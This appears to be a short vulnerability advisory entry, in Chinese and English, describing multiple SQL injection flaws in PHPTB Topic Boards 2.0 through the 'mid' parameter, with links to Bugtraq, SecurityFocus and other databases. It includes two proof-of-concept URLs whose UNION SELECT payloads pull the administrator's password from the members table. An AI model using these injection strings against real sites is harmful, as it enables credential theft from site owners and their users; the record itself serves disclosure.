https://www.exploit-db.com/exploits/26144
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-147

PHPTBTopicBoards2.0中的emailvalidate.php存在多个SQL注入漏洞。这使得远程攻击者可以借助于mid参数执行任意SQL命令。

source: http://www.securityfocus.com/bid/14535/info

PHPTB is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.

The consequences of this attack may vary depending on the type of queries that can be influenced, and the implementation of the database. 

http://www.example.com/PHPTB/index.php?sid=cc3de2fc8c2b357b6a6d46ea8aa92a32&act=profile&mid=-99%20UNION%20SELECT%20null,password,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20tb_members%20WHERE%20user_id=1
http://www.example.com/PHPTB/index.php?sid=a284c075e8b0073935ba7290ca0dade8&act=newpm&mid=-99%20UNION%20SELECT%20password%20FROM%20tb_members%20WHERE%20user_id=1

来源:BID
名称:14535
链接:http://www.securityfocus.com/bid/14535
来源:XF
名称:phptb-mid-sql-injection(21813)
链接:http://xforce.iss.net/xforce/xfdb/21813
来源:OSVDB
名称:18736
链接:http://www.osvdb.org/18736
来源:SECUNIA
名称:16443
链接:http://secunia.com/advisories/16443
来源:BUGTRAQ
名称:20050813SQLinPHPTBTopicBoards2.0
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112395837127707&w;=2